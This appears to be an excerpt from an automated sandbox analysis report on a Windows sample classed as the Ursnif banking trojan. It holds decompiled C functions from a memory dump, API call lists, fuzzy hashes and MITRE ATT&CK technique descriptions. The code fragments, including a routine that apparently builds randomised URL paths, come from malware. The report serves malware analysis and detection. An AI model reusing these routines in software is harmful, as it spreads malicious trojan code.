0x022b98ce
0x022b98d9
0x022b98e0
0x022b98e0
0x022b98e9
0x022b98ed
0x022b98fb
0x022b98ef
0x022b98ef
0x022b98f0
0x022b98f1
0x022b98f2
0x022b98f3
0x022b98f4
0x022b98f4
0x022b9900
0x022b9903
0x022b9907
0x022b9909
0x022b9909
0x022b9910
0x00000000
0x022b9912
0x022b9912
0x022b991f
0x00000000
0x022b991f

APIs

CreateEventA.KERNEL32(022BD2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,022B7D37,?,00000001,?), ref: 022B98C1
SetEvent.KERNEL32(00000000,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98CE
Sleep.KERNEL32(00000BB8,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98D9
CloseHandle.KERNEL32(00000000,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98E0

Part of subcall function 022B5BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,022B9900,?,022B9900,?,?,?,?,?,022B9900,?), ref: 022B5C9A

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 4fc37dab20d15924300d346f2af296d3cc9d75f33d00cb08d95a26c037b44ce1
Instruction ID: e54c75ad1ea16630a130aef4050fc1889f30edd4d89bce1e35e473504f5ce1ea
Opcode Fuzzy Hash: 4fc37dab20d15924300d346f2af296d3cc9d75f33d00cb08d95a26c037b44ce1
Instruction Fuzzy Hash: 3C21DA73D1421AAFCF22BFE498849DE77BD9F08390B044826EB51A7108D7709981CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 022B5F58, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E022B5F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E022B1525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x022b5f64
0x022b5f68
0x022b5f69
0x022b5f6a
0x022b5f6c
0x022b5f6e
0x022b5f71
0x022b5f76
0x022b600d
0x022b6014
0x022b6014
0x022b5f7f
0x022b5f86
0x022b5f96
0x022b5f96
0x022b5f9c
0x022b5f9e
0x022b5fa3
0x022b5fac
0x022b5fb2
0x022b5fb7
0x022b5fc2
0x022b5fc6
0x022b5fc8
0x022b5fc9
0x022b5fd2
0x022b5fd6
0x022b5fe7
0x022b5fd8
0x022b5fdd
0x022b5fe2
0x022b5ff1
0x022b5ff1
0x022b5fc6
0x022b5ff7
0x022b5ffd
0x022b5ffd
0x022b6006
0x022b600b
0x022b600b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 022B5F86
lstrlenW.KERNEL32(?), ref: 022B5FBC
memcpy.NTDLL(00000000,?,?,?), ref: 022B5FDD
SysFreeString.OLEAUT32(?), ref: 022B5FF1

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 2d8e84adb9e27f7af4c1640abc85dfa2ffc07687411831b75a2a9cd2a1ee4114
Instruction ID: 1165756e2127f99b004d2501cad0350e5e8a6c1b7b5c1c5953057f211ddf2a44
Opcode Fuzzy Hash: 2d8e84adb9e27f7af4c1640abc85dfa2ffc07687411831b75a2a9cd2a1ee4114
Instruction Fuzzy Hash: 3A21717590120AEFCB12DFE4D8889EEBBB9FF49344B104569E945EB204EB70DA10CF50

Uniqueness

Uniqueness Score: -1.00%

Function 022BA41C, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E022BA41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x22bd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x22bd250; // 0x9d9fc5bc
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x22bd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x022ba424
0x022ba427
0x022ba42d
0x022ba445
0x022ba447
0x022ba44c
0x022ba44e
0x022ba451
0x022ba453
0x022ba456
0x022ba458
0x022ba458
0x022ba45a
0x022ba465
0x022ba46a
0x022ba47b
0x022ba483
0x022ba488
0x022ba48b
0x022ba48e
0x022ba490
0x022ba493
0x022ba496
0x022ba496
0x022ba499
0x022ba4a4
0x022ba4a9
0x022ba4b3

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,022B7C20,00000000,?,?,022B9DA0,?,047795B0), ref: 022BA427
RtlAllocateHeap.NTDLL(00000000,?), ref: 022BA43F
memcpy.NTDLL(00000000,?,-00000008,?,?,?,022B7C20,00000000,?,?,022B9DA0,?,047795B0), ref: 022BA483
memcpy.NTDLL(00000001,?,00000001), ref: 022BA4A4

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4235501702fdb20eb6926caa8423ccedeec94c45628d2b026201e5eca39d1b01
Instruction ID: 817894fcbb44d1c1799e8e82e0ef715ea410159f081aaa69b3cf52842de74b2f
Opcode Fuzzy Hash: 4235501702fdb20eb6926caa8423ccedeec94c45628d2b026201e5eca39d1b01
Instruction Fuzzy Hash: 7E110672E40215AFC3158AE9DC88DDABBBEDFC43A1B050276F80497141EB709E148760

Uniqueness

Uniqueness Score: -1.00%

Function 022B8C01, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B8C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x022b8c0b
0x022b8c0f
0x022b8c24
0x022b8c26
0x022b8c2b
0x022b8c31
0x022b8c33
0x022b8c38
0x022b8c43
0x022b8c3a
0x022b8c3a
0x022b8c3a
0x022b8c38
0x022b8c51

APIs

memset.NTDLL ref: 022B8C0F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 022B8C24
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 022B8C31
CloseHandle.KERNEL32(?), ref: 022B8C43

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: b6632ea0708cf8b7d28637f41a25936e31d25e26250633cc9473a2e01060dd9c
Instruction ID: 81c7107b10114a8700b31b38d07b9648d39c11907f3bff9a9d32d44b67a74a4e
Opcode Fuzzy Hash: b6632ea0708cf8b7d28637f41a25936e31d25e26250633cc9473a2e01060dd9c
Instruction Fuzzy Hash: F9F0BEF1506308BFD3156FA2DCC4C2BBBACEF4129AB194D2EF04682111C672A8488AB0

Uniqueness

Uniqueness Score: -1.00%

Function 022B4DB1, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B4DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x22bd26c; // 0x1ac
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x22bd2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x22bd26c; // 0x1ac
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x22bd238; // 0x4380000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x022b4db1
0x022b4db8
0x022b4e02
0x022b4e04
0x022b4e04
0x022b4dbc
0x022b4dc2
0x022b4dc7
0x022b4dcb
0x022b4dd1
0x022b4dd8
0x00000000
0x00000000
0x022b4dda
0x022b4ddf
0x00000000
0x00000000
0x00000000
0x022b4ddf
0x022b4de1
0x022b4de9
0x022b4dec
0x022b4dec
0x022b4df2
0x022b4df9
0x022b4dfc
0x022b4dfc
0x00000000

APIs

SetEvent.KERNEL32(000001AC,00000001,022B7F41), ref: 022B4DBC
SleepEx.KERNEL32(00000064,00000001), ref: 022B4DCB
CloseHandle.KERNEL32(000001AC), ref: 022B4DEC
HeapDestroy.KERNEL32(04380000), ref: 022B4DFC

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: fc00813c0ec4d1226f6addf1a28443748d4b87cc3f6700b44d0a96643a69cf5c
Instruction ID: 21ef3d407eb7b35724f766421f5b416c53090b138f40fa814191e546f8b0eb8f
Opcode Fuzzy Hash: fc00813c0ec4d1226f6addf1a28443748d4b87cc3f6700b44d0a96643a69cf5c
Instruction Fuzzy Hash: 75F08239E953138BDA236AF5B89CB833A98AF047A0B044E10B900D7386CB60DC50C560

Uniqueness

Uniqueness Score: -1.00%

Function 022B8CFA, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E022B8CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E022B1525(_t2);
				if(_t34 != 0) {
					_t30 = E022B1525(_t28);
					if(_t30 == 0) {
						E022B8B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E022BA7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E022BA7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x022b8cfa
0x022b8d04
0x022b8d06
0x022b8d0c
0x022b8d0c
0x022b8d15
0x022b8d19
0x022b8d25
0x022b8d29
0x022b8d9d
0x022b8d2b
0x022b8d2b
0x022b8d2f
0x022b8d34
0x022b8d39
0x022b8d53
0x022b8d42
0x022b8d42
0x022b8d46
0x022b8d49
0x022b8d4e
0x022b8d4e
0x022b8d58
0x022b8d80
0x022b8d86
0x022b8d89
0x022b8d5a
0x022b8d5c
0x022b8d64
0x022b8d6f
0x022b8d74
0x022b8d74
0x022b8d90
0x022b8d97
0x022b8d98
0x022b8d98
0x022b8d29
0x022b8da8

APIs

lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000), ref: 022B8D06

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

Part of subcall function 022BA7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,022B8D34,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102), ref: 022BA7D0
Part of subcall function 022BA7C2: StrChrA.SHLWAPI(?,0000003F,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022BA7DA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102,022B937B,?), ref: 022B8D64
lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D74
lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D80

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 60faa0634f530c05c2ff258f31aa48387a3a7917365a391b75a9d546a4ae9b2d
Instruction ID: ff38b0755cadf074efcdd91ac50279f7ab19b3b2b1a3a4764ec7412eb553016c
Opcode Fuzzy Hash: 60faa0634f530c05c2ff258f31aa48387a3a7917365a391b75a9d546a4ae9b2d
Instruction Fuzzy Hash: C0219072524257AFCB035FF9D844AEA7FBDAF163C4F048456F9099B215DB70C9108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 022B272D, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E022B1525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x022b2742
0x022b2746
0x022b2750
0x022b2755
0x022b275a
0x022b275c
0x022b2764
0x022b2769
0x022b2777
0x022b277c
0x022b2786

APIs

lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0477935C,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B273D
lstrlenW.KERNEL32(022B5398,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B2744

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B2764
memcpy.NTDLL(74E069A0,022B5398,00000002,00000000,004F0053,74E069A0,?,?,022B5398,004F0053,0477935C), ref: 022B2777

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 7275af3dc85ff03b843a92ef3f22ea42f0f6f7155d4f06841fecfb6db918073f
Instruction ID: 30200d2a8fb0c166293e89aea37821c4bbf9a330be52ae2dca02caba4ae32bc8
Opcode Fuzzy Hash: 7275af3dc85ff03b843a92ef3f22ea42f0f6f7155d4f06841fecfb6db918073f
Instruction Fuzzy Hash: 93F03C32910119BB8B129FE9CC44CDE7BADEF093947054462AD0497105EA31EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 022BA677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
lstrlen.KERNEL32(?), ref: 022BA68F

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
lstrcat.KERNEL32(00000000,?), ref: 022BA6AE

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f9e23268d9e12000d37aa2fdc0f96aecc0c83400bbaa0744dc5bda3c80baf7c5
Instruction ID: 749619c357926ffd095fef379ecd817b26e4255d72d0f9e31fc70ceda824fbab
Opcode Fuzzy Hash: f9e23268d9e12000d37aa2fdc0f96aecc0c83400bbaa0744dc5bda3c80baf7c5
Instruction Fuzzy Hash: E2E01273D056216B87139BE4BC4CC9BBBADEF9A7557040C17F600D3114C765D8258BE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report R0xLHA2mT5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

